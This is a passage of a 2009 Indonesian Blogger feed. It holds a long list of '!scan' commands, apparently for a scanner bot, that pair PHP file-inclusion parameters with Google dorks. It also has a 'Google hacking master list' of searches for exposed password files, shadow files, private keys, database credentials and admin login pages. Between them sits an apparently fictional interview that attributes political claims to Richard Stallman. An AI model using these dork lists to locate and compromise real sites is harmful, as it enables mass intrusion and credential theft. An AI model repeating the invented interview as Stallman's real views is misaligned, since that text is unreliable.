lang.php?subpage= allinurl:".php?subpage="&lt;br /&gt;!scan lang.php?subp= allinurl:".php?sub="&lt;br /&gt;!scan lang.php?subp= allinurl:".php?subp="&lt;br /&gt;!scan /lib/db/ez_sql.php?lib_path= ttCMS&lt;br /&gt;!scan /lib/db/ez_sql.php?lib_path= ttCMS &lt;= v4&lt;br /&gt;!scan /lib/static/header.php?set_menu= iPhoto Album&lt;br /&gt;!scan /lib/static/header.php?set_menu= iPhotoAlbum&lt;br /&gt;!scan /lib/static/header.php?set_menu= iPhotoAlbum v1.1&lt;br /&gt;!scan link.php?do= allinurl:".php?do="&lt;br /&gt;!scan list.php?product= allinurl:.php?product=&lt;br /&gt;!scan list.php?table= allinurl:.php?table=&lt;br /&gt;!scan ln.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan loc.php?l= allinurl:".php?l="&lt;br /&gt;!scan loc.php?l= allinurl:".php?loc="&lt;br /&gt;!scan loc.php?lang= allinurl:".php?lang="&lt;br /&gt;!scan loc.php?lang= allinurl:".php?loc="&lt;br /&gt;!scan loc.php?loc= allinurl:"loc.php?loc="&lt;br /&gt;!scan loc.php?loc= allinurl:".php?loc="&lt;br /&gt;!scan login.php?loca= .php?loca=&lt;br /&gt;!scan magazine.php?inc= allinurl:".php?inc="&lt;br /&gt;!scan main1.php?arg= allinurl:.php?arg=&lt;br /&gt;!scan main1.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan main2.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan main.html.php?seite= allinurl:.php?seite=&lt;br /&gt;!scan main.php3?act= allinurl:"main.php3?act="&lt;br /&gt;!scan main.php3?act= allinurl:".php3?act="&lt;br /&gt;!scan main.php5?page= .php5?id=&lt;br /&gt;!scan main.php?a= allinurl:".php?a="&lt;br /&gt;!scan main.php?arg= allinurl:.php?arg=&lt;br /&gt;!scan main.php?ba= allinurl:"main.php?ba="&lt;br /&gt;!scan main.php?ba= allinurl:".php?ba="&lt;br /&gt;!scan main.php?command= allinurl:"main.php?command="&lt;br /&gt;!scan main.php?command= allinurl:".php?command="&lt;br /&gt;!scan main.php?d1= allinurl:"main.php?d1="&lt;br /&gt;!scan main.php?d1= allinurl:".php?d1="&lt;br /&gt;!scan main.php?f1= allinurl:".php?f1="&lt;br /&gt;!scan main.php?fset= allinurl:".php?fset="&lt;br /&gt;!scan main.php?id= inurl:"main.php?id=*.php"&lt;br /&gt;!scan main.php?inc= allinurl:".php?inc="&lt;br /&gt;!scan main.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan main.php?ltr= allinurl:".php?ltr="&lt;br /&gt;!scan main.php?s= allinurl:"main.php?s="&lt;br /&gt;!scan main.php?s= allinurl:main.php?s=&lt;br /&gt;!scan main.php?s= allinurl:.php?s=&lt;br /&gt;!scan main.php?s= allinurl:".php?s="&lt;br /&gt;!scan main.php?sit= allinurl:".php?sit="&lt;br /&gt;!scan main.php?table= allinurl:.php?table=&lt;br /&gt;!scan main.php?vis= allinurl:"main.php?vis="&lt;br /&gt;!scan main.php?vis= allinurl:main.php?vis=&lt;br /&gt;!scan main.php?vis= allinurl:".php?vis="&lt;br /&gt;!scan mai.php?act= allinurl:"mai.php?act="&lt;br /&gt;!scan mai.php?act= allinurl:mai.php?act=&lt;br /&gt;!scan mai.php?loc= allinurl:"mai.php?loc="&lt;br /&gt;!scan mai.php?loc= allinurl:mai.php?loc=&lt;br /&gt;!scan mai.php?src= allinurl:"mai.php?src="&lt;br /&gt;!scan mai.php?src= allinurl:mai.php?src=&lt;br /&gt;!scan map.php?loc= map.php?loc=&lt;br /&gt;!scan middle.php?file= inurl:"middle.php?file="&lt;br /&gt;!scan middle.php?file= inurl:"middle.php?page="&lt;br /&gt;!scan middle.php?file= inurl:".php?file="&lt;br /&gt;!scan middle.php?file= inurl:".php?page="&lt;br /&gt;!scan middle.php?file= middle.php?file=&lt;br /&gt;!scan middle.php?file= middle.php?page=&lt;br /&gt;!scan middle.php?file= .php?file=&lt;br /&gt;!scan middle.php?file= .php?page=&lt;br /&gt;!scan middle.php?page= inurl:"middle.php?page="&lt;br /&gt;!scan middle.php?page= inurl:".php?page="&lt;br /&gt;!scan middle.php?page= middle.php?page=&lt;br /&gt;!scan middle.php?page= .php?page=&lt;br /&gt;!scan misc.php?do= allinurl:".php?do="&lt;br /&gt;!scan mod.php?mod= allinurl:"mod.php?mod="&lt;br /&gt;!scan mod.php?mod= allinurl:".php?mod="&lt;br /&gt;!scan module.php?mod= allinurl:"module.php?mod="&lt;br /&gt;!scan module.php?mod= allinurl:".php?mod="&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= allinurl:"PostGuestbook"&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook"&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook 0.6.1"&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook&lt;br /&gt;!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1&lt;br /&gt;!scan modul.php?mod= allinurl:"modul.php?mod="&lt;br /&gt;!scan modul.php?mod= allinurl:".php?mod="&lt;br /&gt;!scan more.php?sub= "more.php?sub="&lt;br /&gt;!scan more.php?sub= more.php?sub=&lt;br /&gt;!scan nav.php?g= "nav.php?g="&lt;br /&gt;!scan nav.php?g= nav.php?g=&lt;br /&gt;!scan nav.php?go= "nav.php?go="&lt;br /&gt;!scan nav.php?go= nav.php?go=&lt;br /&gt;!scan nav.php?lk= allinurl:".php?lk="&lt;br /&gt;!scan nav.php?ln= allinurl:.php?ln=&lt;br /&gt;!scan nav.php?loc= nav.php&lt;br /&gt;!scan nav.php?loc= nav.php?loc=&lt;br /&gt;!scan nav.php?loc= .php?loc=&lt;br /&gt;!scan nav.php?nav= "nav.php?nav="&lt;br /&gt;!scan nav.php?nav= nav.php?nav=&lt;br /&gt;!scan nav.php?page= "nav.php?page="&lt;br /&gt;!scan nav.php?page= nav.php?page=&lt;br /&gt;!scan nav.php?pagina= "nav.php?pagina="&lt;br /&gt;!scan template.php?sekce=&lt;br /&gt;!scan down*.php?goFile=&lt;br /&gt;!scan blank.php?header=&lt;br /&gt;!scan start.php?body=&lt;br /&gt;!scan standard.php?body=&lt;br /&gt;!scan base.php?path=&lt;br /&gt;!scan base.php?module=&lt;br /&gt;!scan default.php?l=&lt;br /&gt;!scan principal.php?strona=&lt;br /&gt;!scan info.php?l=&lt;br /&gt;!scan template.php?left=&lt;br /&gt;!scan index2.php?texto=&lt;br /&gt;!scan home.php?eval=&lt;br /&gt;!scan padrao.php?section=&lt;br /&gt;!scan blank.php?goFile=&lt;br /&gt;!scan head.php?loc=&lt;br /&gt;!scan index.php?index=&lt;br /&gt;!scan page.php?ir=&lt;br /&gt;!scan print.php?path=&lt;br /&gt;!scan layout.php?ir=&lt;br /&gt;!scan blank.php?pollname=&lt;br /&gt;!scan down*.php?path=&lt;br /&gt;!scan include.php?x=&lt;br /&gt;!scan sitio.php?opcion=&lt;br /&gt;!scan pagina.php?category=&lt;br /&gt;!scan start.php?pageweb=&lt;br /&gt;!scan gallery.php?rub=&lt;br /&gt;!scan template.php?sp=&lt;br /&gt;!scan sub*.php?basepath=&lt;br /&gt;!scan press.php?menu=&lt;br /&gt;!scan standard.php?section=&lt;br /&gt;!scan enter.php?abre=&lt;br /&gt;!scan index2.php?pref=&lt;br /&gt;!scan index1.php?pa=&lt;br /&gt;!scan sitio.php?incl=&lt;br /&gt;!scan principal.php?seite=&lt;br /&gt;!scan show.php?ki=&lt;br /&gt;!scan gallery.php?chapter=&lt;br /&gt;!scan nota.php?qry=&lt;br /&gt;!scan pagina.php?pagina=&lt;br /&gt;!scan index3.php?x=&lt;br /&gt;!scan default.php?menu=&lt;br /&gt;!scan page.php?strona=&lt;br /&gt;!scan *inc*.php?open=&lt;br /&gt;!scan index3.php?secao=&lt;br /&gt;!scan standard.php?*[*]*=&lt;br /&gt;!scan default.php?abre=&lt;br /&gt;!scan template.php?basepath=&lt;br /&gt;!scan standard.php?goFile=&lt;br /&gt;!scan index2.php?ir=&lt;br /&gt;!scan file.php?modo=&lt;br /&gt;!scan gallery.php?itemnav=&lt;br /&gt;!scan main.php?oldal=&lt;br /&gt;!scan press.php?pg=&lt;br /&gt;!scan down*.php?showpage=&lt;br /&gt;!scan start.php?nivel=&lt;br /&gt;!scan start.php?destino=&lt;br /&gt;!scan index1.php?filepath=&lt;br /&gt;!scan blank.php?rub=&lt;br /&gt;!scan path.php?ir=&lt;br /&gt;!scan layout.php?var=&lt;br /&gt;!scan padrao.php?op=&lt;br /&gt;!scan mod*.php?pre=&lt;br /&gt;!scan index1.php?texto=&lt;br /&gt;!scan start.php?pg=&lt;br /&gt;!scan default.php?pa=&lt;br /&gt;!scan press.php?strona=&lt;br /&gt;!scan nota.php?cmd=&lt;br /&gt;!scan index1.php?showpage=&lt;br /&gt;!scan info.php?go=&lt;br /&gt;!scan standard.php?abre=&lt;br /&gt;!scan general.php?seccion=&lt;br /&gt;!scan index1.php?itemnav=&lt;br /&gt;!scan layout.php?seite=&lt;br /&gt;!scan path.php?load=&lt;br /&gt;!scan home.php?pollname=&lt;br /&gt;!scan path.php?left=&lt;br /&gt;!scan down*.php?inc=&lt;br /&gt;!scan index3.php?abre=&lt;br /&gt;!scan blank.php?where=&lt;br /&gt;!scan info.php?start=&lt;br /&gt;!scan include.php?channel=&lt;br /&gt;!scan print.php?dir=&lt;br /&gt;!scan pag&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5810858978506140718-198097036557589930?l=jerichositumorang.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/198097036557589930/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5810858978506140718&amp;postID=198097036557589930' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/198097036557589930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/198097036557589930'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/2009/05/sqli-dork.html' title='SQLi Dork'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5810858978506140718.post-6503305219006295271</id><published>2009-04-02T03:59:00.000-07:00</published><updated>2009-04-02T04:04:17.096-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='penjajahan'/><category scheme='http://www.blogger.com/atom/ns#' term='AS'/><title type='text'>Penjajahan Terbalik</title><content type='html'>&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;PENJAJAHAN TERBALIK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;BERNARIDHO I. HUTABARAT (Business Intelligence Expert)&lt;br /&gt;&lt;br /&gt;Alkisah, RMS membaca tulisan saya “A Program is NOT like a recipe”.&lt;br /&gt;Kami bertemu empat mata dalam suatu kesempatan dan saya memakai&lt;br /&gt;kesempatan untuk mewawancarai orang yang sangat terkenal ini.&lt;br /&gt;&lt;br /&gt;SAYA SEPERTI orang berkepribadian ganda. Anti-Barat, tapi&lt;br /&gt;memakai produk dari Barat: jeans, Yahoo!, Google, Linux, dan&lt;br /&gt;mempropagandakan open source (yang notabene produk Barat).&lt;br /&gt;Berikut adalah petikan wawancaranya:&lt;br /&gt;BIH: Selamat pagi, senang bertemu Anda.&lt;br /&gt;RMS: Selamat pagi. Saya membaca tulisan Anda dan saya pikir&lt;br /&gt;           tulisan tersebut tidak istimewa.&lt;br /&gt;BIH: Tidak apa-apa. Tapi, bagaimana kalau kita bicara hal yang&lt;br /&gt;          lain saja?&lt;br /&gt;RMS: Okay. Saya dengar Anda beberapa kali berbicara tentang&lt;br /&gt;          “Pintu gerbang kemerdekaan”. Apakah Anda merasa kami,&lt;br /&gt;           orang-orang Barat sebagai penjajah?&lt;br /&gt;BIH: Ya.&lt;br /&gt;RMS: Analisis Anda dangkal. Tidakkah Anda lihat bahwa sudah&lt;br /&gt;           terjadi penjajahan terbalik?&lt;br /&gt;BIH: Penjajahan terbalik?&lt;br /&gt;RMS: Ya. Penjajahan oleh negara berkembang terhadap negaranegara&lt;br /&gt;            maju.&lt;br /&gt;BIH: Persisnya?&lt;br /&gt;RMS: Itu terjadi dalam bidang software. Kami bekerja keras&lt;br /&gt;           untuk membuat Linux, banyak opened source-code software,&lt;br /&gt;           dan memberikannya secara gratis. Negara-negara berkembang&lt;br /&gt;           (dan melakukan pelanggaran HAM) seperti Nigeria dan China,&lt;br /&gt;           menikmati hasilnya. Toh, rasa antipati masyarakat umum di&lt;br /&gt;           negara-negara tersebut terhadap Barat dan Amerika tetap&lt;br /&gt;           tinggi.&lt;br /&gt;BIH  : Mengapa disebut penjajahan?&lt;br /&gt;RMS: Pada penjajahan, pihak yang dijajah bekerja keras sementara&lt;br /&gt;           pihak penjajah ongkang-ongkang kaki menerima hasilnya.&lt;br /&gt;           Negara Barat membuat dan memperbaiki Linux, tetapi masyarakat&lt;br /&gt;           negara berkembang tinggal menikmati hasil kerja tersebut.&lt;br /&gt;BIH  : Hmmm, benar.&lt;br /&gt;RMS: Banyak orang di negara berkembang tidak menyadari kelelahan&lt;br /&gt;           dalam membuat, mendebat, dan memaparkan spesifi kasi.&lt;br /&gt;           Banyak orang di negara berkembang tidak merasakan sakitnya&lt;br /&gt;           menguji compliance suatu produk terhadap spesifi kasi. Mereka&lt;br /&gt;           cuma menjadi pemimpin komunitas dan kolumnis seperti Anda,&lt;br /&gt;           tapi tak membuat produk apapun.&lt;br /&gt;BIH : Tapi, bukankah Anda dan banyak programer lain menikmati&lt;br /&gt;           pekerjaan yang painful dan “unpaid” tersebut?&lt;br /&gt;RMS: Ya (mengeluh nafas panjang), sayangnya begitu. Kadangkadang&lt;br /&gt;           manusia menikmati hal yang menyakitkan.&lt;br /&gt;BIH  : Itu suatu penyakit psikologis?&lt;br /&gt;RMS: Saya tidak mau sebut demikian dan please jangan dibahas.&lt;br /&gt;BIH  : Apa yang Anda dan orang-orang Barat harus lakukan?&lt;br /&gt;RMS: Kami, orang-orang Amerika, Jepang, dan Eropa harus&lt;br /&gt;           membangun jatidiri dan menghilangkan rasa bersalah berlebihan&lt;br /&gt;           atas penjajahan di masa lalu. Penjajahan/tirani bisa (dan) dilakukan&lt;br /&gt;           tidak hanya oleh Barat, tetapi juga oleh Timur. Jepang dan Malaysia&lt;br /&gt;           adalah negara Timur. Jepang penjajah ekonomi dan Malaysia&lt;br /&gt;           bersifat tiran. Penjajah tidak selalu orang Barat.&lt;br /&gt;BIH  : Ada contoh lain?&lt;br /&gt;RMS: OPEC. Kebanyakan negara OPEC bukan negara Barat, dan&lt;br /&gt;           mereka suka mengkritik Barat dan AS. Tapi dalam hal software;&lt;br /&gt;           secara praktis mereka boleh dikatakan tidak menyumbang apapun&lt;br /&gt;           untuk kemajuan umat manusia di seluruh dunia. Mereka cuma mau&lt;br /&gt;           enaknya memakai free software. Bill Gates menyumbang ke banyak&lt;br /&gt;           orang tanpa memandang ras, agama, dan kebangsaan. Tapi,&lt;br /&gt;           banyak individu kaya dari OPEC tidak berbuat hal yang sama.&lt;br /&gt;BIH : Bagaimana perasaan Anda tentang sikap anti-Amerika?&lt;br /&gt;RMS: Saya sedih dan marah membaca penilaian yang tidak adil terhadap&lt;br /&gt;           Amerika. Saya yang memperjuangkan free software adalah&lt;br /&gt;           warga Amerika. Free Software Foundation berkantor di Amerika,&lt;br /&gt;           tapi membuat free software untuk dipakai manusia di seluruh dunia.&lt;br /&gt;           Kalau mereka anti-Amerika berarti mereka juga antisaya.&lt;br /&gt;BIH : Pesan terakhir?&lt;br /&gt;RMS: Lebih mudah menghadapi Anda yang terus terang mengkritik&lt;br /&gt;           Linux daripada menghadapi pendukung free software,&lt;br /&gt;           tetapi diam-diam anti-Barat.&lt;br /&gt;BIH : Mr. Stallman, thank you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5810858978506140718-6503305219006295271?l=jerichositumorang.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jerichositumorang.blogspot.com/feeds/6503305219006295271/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5810858978506140718&amp;postID=6503305219006295271' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/6503305219006295271'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5810858978506140718/posts/default/6503305219006295271'/><link rel='alternate' type='text/html' href='http://jerichositumorang.blogspot.com/2009/04/penjajahan-terbalik.html' title='Penjajahan Terbalik'/><author><name>Jericho PS</name><uri>http://www.blogger.com/profile/10905013783242426389</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_8QcVoMNZWbc/TI5GPFjwDGI/AAAAAAAAABk/MKgAwcHpGxM/S220/100_2302+(Small).JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5810858978506140718.post-2770364711742658683</id><published>2009-03-30T05:13:00.001-07:00</published><updated>2009-03-30T05:15:03.963-07:00</updated><title type='text'>Google hacking master list</title><content type='html'>Lagi browsing -browsing dapet di website http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;admin account info" filetype:log&lt;br /&gt;!Host=*.* intext:enc_UserPassword=* ext:pcf&lt;br /&gt;"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd&lt;br /&gt;"AutoCreate=TRUE password=*"&lt;br /&gt;"http://*:*@www" domainname&lt;br /&gt;"index of/" "ws_ftp.ini" "parent directory"&lt;br /&gt;"liveice configuration file" ext:cfg -site:sourceforge.net&lt;br /&gt;"parent directory" +proftpdpasswd&lt;br /&gt;Duclassified" -site:duware.com "DUware All Rights reserved"&lt;br /&gt;duclassmate" -site:duware.com&lt;br /&gt;Dudirectory" -site:duware.com&lt;br /&gt;dudownload" -site:duware.com&lt;br /&gt;Elite Forum Version *.*"&lt;br /&gt;Link Department"&lt;br /&gt;"sets mode: +k"&lt;br /&gt;"your password is" filetype:log&lt;br /&gt;DUpaypal" -site:duware.com&lt;br /&gt;allinurl: admin mdb&lt;br /&gt;auth_user_file.txt&lt;br /&gt;config.php&lt;br /&gt;eggdrop filetype:user user&lt;br /&gt;enable password | secret "current configuration" -intext:the&lt;br /&gt;etc (index.of)&lt;br /&gt;ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn&lt;br /&gt;ext:inc "pwd=" "UID="&lt;br /&gt;ext:ini eudora.ini&lt;br /&gt;ext:ini Version=4.0.0.4 password&lt;br /&gt;ext:passwd -intext:the -sample -example&lt;br /&gt;ext:txt inurl:unattend.txt&lt;br /&gt;ext:yml database inurl:config&lt;br /&gt;filetype:bak createobject sa&lt;br /&gt;filetype:bak inurl:"htaccess|passwd|shadow|htusers"&lt;br /&gt;filetype:cfg mrtg "target&lt;br /&gt;filetype:cfm "cfapplication name" password&lt;br /&gt;filetype:conf oekakibbs&lt;br /&gt;filetype:conf slapd.conf&lt;br /&gt;filetype:config config intext:appSettings "User ID"&lt;br /&gt;filetype:dat "password.dat"&lt;br /&gt;filetype:dat inurl:Sites.dat&lt;br /&gt;filetype:dat wand.dat&lt;br /&gt;filetype:inc dbconn&lt;br /&gt;filetype:inc intext:mysql_connect&lt;br /&gt;filetype:inc mysql_connect OR mysql_pconnect&lt;br /&gt;filetype:inf sysprep&lt;br /&gt;filetype:ini inurl:"serv-u.ini"&lt;br /&gt;filetype:ini inurl:flashFXP.ini&lt;br /&gt;filetype:ini ServUDaemon&lt;br /&gt;filetype:ini wcx_ftp&lt;br /&gt;filetype:ini ws_ftp pwd&lt;br /&gt;filetype:ldb admin&lt;br /&gt;filetype:log "See `ipsec --copyright"&lt;br /&gt;filetype:log inurl:"password.log"&lt;br /&gt;filetype:mdb inurl:users.mdb&lt;br /&gt;filetype:mdb wwforum&lt;br /&gt;filetype:netrc password&lt;br /&gt;filetype:pass pass intext:userid&lt;br /&gt;filetype:pem intext:private&lt;br /&gt;filetype:properties inurl:db intext:password&lt;br /&gt;filetype:pwd service&lt;br /&gt;filetype:pwl pwl&lt;br /&gt;filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"&lt;br /&gt;filetype:reg reg +intext:â? WINVNC3â?&lt;br /&gt;filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS&lt;br /&gt;filetype:sql "insert into" (pass|passwd|password)&lt;br /&gt;filetype:sql ("values * MD5" | "values * password" | "values * encrypt")&lt;br /&gt;filetype:sql +"IDENTIFIED BY" -cvs&lt;br /&gt;filetype:sql password&lt;br /&gt;filetype:url +inurl:"ftp://" +inurl:";@"&lt;br /&gt;filetype:xls username password email&lt;br /&gt;htpasswd&lt;br /&gt;htpasswd / htgroup&lt;br /&gt;htpasswd / htpasswd.bak&lt;br /&gt;intext:"enable password 7"&lt;br /&gt;intext:"enable secret 5 $"&lt;br /&gt;intext:"EZGuestbook"&lt;br /&gt;intext:"Web Wiz Journal"&lt;br /&gt;intitle:"index of" intext:connect.inc&lt;br /&gt;intitle:"index of" intext:globals.inc&lt;br /&gt;intitle:"Index of" passwords modified&lt;br /&gt;intitle:"Index of" sc_serv.conf sc_serv content&lt;br /&gt;intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"&lt;br /&gt;intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com&lt;br /&gt;intitle:index.of administrators.pwd&lt;br /&gt;intitle:Index.of etc shadow&lt;br /&gt;intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"&lt;br /&gt;intitle:rapidshare intext:login&lt;br /&gt;inurl:"calendars?ri?t/users.txt"&lt;br /&gt;inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"&lt;br /&gt;inurl:"GRC.DAT" intext:"password"&lt;br /&gt;inurl:"Sites.dat"+"PASS="&lt;br /&gt;inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample&lt;br /&gt;inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample&lt;br /&gt;inurl:"wvdial.conf" intext:"password"&lt;br /&gt;inurl:/db/main.mdb&lt;br /&gt;inurl:/wwwboard&lt;br /&gt;inurl:/yabb/Members/Admin.dat&lt;br /&gt;inurl:ccbill filetype:log&lt;br /&gt;inurl:cgi-bin inurl:calendar.cfg&lt;br /&gt;inurl:chap-secrets -cvs&lt;br /&gt;inurl:config.php dbuname dbpass&lt;br /&gt;inurl:filezilla.xml -cvs&lt;br /&gt;inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man&lt;br /&gt;inurl:nuke filetype:sql&lt;br /&gt;inurl:ospfd.conf intext:password -sample -test -tutorial -download&lt;br /&gt;inurl:pap-secrets -cvs&lt;br /&gt;inurl:pass.dat&lt;br /&gt;inurl:perform filetype:ini&lt;br /&gt;inurl:perform.ini filetype:ini&lt;br /&gt;inurl:secring ext:skr | ext:pgp | ext:bak&lt;br /&gt;inurl:server.cfg rcon password&lt;br /&gt;inurl:ventrilo_srv.ini adminpassword&lt;br /&gt;inurl:vtund.conf intext:pass -cvs&lt;br /&gt;inurl:zebra.conf intext:password -sample -test -tutorial -download&lt;br /&gt;LeapFTP intitle:"index.of./" sites.ini modified&lt;br /&gt;master.passwd&lt;br /&gt;mysql history files&lt;br /&gt;NickServ registration passwords&lt;br /&gt;passlist&lt;br /&gt;passlist.txt (a better way)&lt;br /&gt;passwd&lt;br /&gt;passwd / etc (reliable)&lt;br /&gt;people.lst&lt;br /&gt;psyBNC config files&lt;br /&gt;pwd.db&lt;br /&gt;server-dbs "intitle:index of"&lt;br /&gt;signin filetype:url&lt;br /&gt;spwd.db / passwd&lt;br /&gt;trillian.ini&lt;br /&gt;wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin&lt;br /&gt;[WFClient] Password= filetype:ica&lt;br /&gt;intitle:"remote assessment" OpenAanval Console&lt;br /&gt;intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"&lt;br /&gt;"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com&lt;br /&gt;"Emergisoft web applications are a part of our"&lt;br /&gt;"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-&lt;br /&gt;"HostingAccelerator" intitle:"login" +"Username" -"news" -demo&lt;br /&gt;"iCONECT 4.1 :: Login"&lt;br /&gt;"IMail Server Web Messaging" intitle:login&lt;br /&gt;"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com&lt;br /&gt;"intitle:3300 Integrated Communications Platform" inurl:main.htm&lt;br /&gt;"Login - Sun Cobalt RaQ"&lt;br /&gt;"login prompt" inurl:GM.cgi&lt;br /&gt;"Login to Usermin" inurl:20000&lt;br /&gt;"Microsoft CRM : Unsupported Browser Version"&lt;br /&gt;"OPENSRS Domain Management" inurl:manage.cgi&lt;br /&gt;"pcANYWHERE EXPRESS Java Client"&lt;br /&gt;"Please authenticate yourself to get access to the management interface"&lt;br /&gt;"please log in"&lt;br /&gt;"Please login with admin pass" -"leak" -sourceforge&lt;br /&gt;CuteNews" "2003..2005 CutePHP"&lt;br /&gt;DWMail" password intitle:dwmail&lt;br /&gt;Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com&lt;br /&gt;Midmart Messageboard" "Administrator Login"&lt;br /&gt;Monster Top List" MTL numrange:200-&lt;br /&gt;UebiMiau" -site:sourceforge.net&lt;br /&gt;"site info for" "Enter Admin Password"&lt;br /&gt;"SquirrelMail version" "By the SquirrelMail development Team"&lt;br /&gt;"SysCP - login"&lt;br /&gt;"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac&lt;br /&gt;"This section is for Administrators only. If you are an administrator then please"&lt;br /&gt;"ttawlogin.cgi/?action="&lt;br /&gt;"VHCS Pro ver" -demo&lt;br /&gt;"VNC Desktop" inurl:5800&lt;br /&gt;"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com&lt;br /&gt;"WebExplorer Server - Login" "Welcome to WebExplorer Server"&lt;br /&gt;"WebSTAR Mail - Please Log In"&lt;br /&gt;"You have requested access to a restricted area of our website. Please authenticate yourself to continue."&lt;br /&gt;"You have requested to access the management functions" -.edu&lt;br /&gt;(intitle:"Please login - Forums&lt;br /&gt;UBB.threads")|(inurl:login.php "ubb")&lt;br /&gt;(intitle:"Please login - Forums&lt;br /&gt;WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")&lt;br /&gt;(intitle:"rymo Login")|(intext:"Welcome to rymo") -family&lt;br /&gt;(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")&lt;br /&gt;(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil&lt;br /&gt;4images Administration Control Panel&lt;br /&gt;allintitle:"Welcome to the Cyclades"&lt;br /&gt;allinurl:"exchange/logon.asp"&lt;br /&gt;allinurl:wps/portal/ login&lt;br /&gt;ASP.login_aspx "ASP.NET_SessionId"&lt;br /&gt;CGI:IRC Login&lt;br /&gt;ext:cgi intitle:"control panel" "enter your owner password to continue!"&lt;br /&gt;ez Publish administration&lt;br /&gt;filetype:php inurl:"webeditor.php"&lt;br /&gt;filetype:pl "Download: SuSE Linux Openexchange Server CA"&lt;br /&gt;filetype:r2w r2w&lt;br /&gt;intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"&lt;br /&gt;intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu&lt;br /&gt;intext:"Mail admins login here to administrate your domain."&lt;br /&gt;intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin&lt;br /&gt;intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin&lt;br /&gt;intext:"Storage Management Server for" intitle:"Server Administration"&lt;br /&gt;intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee&lt;br /&gt;intext:"vbulletin" inurl:admincp&lt;br /&gt;intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press&lt;br /&gt;intitle:"Admin Login" "admin login" "blogware"&lt;br /&gt;intitle:"Admin login" "Web Site Administration" "Copyright"&lt;br /&gt;intitle:"AlternC Desktop"&lt;br 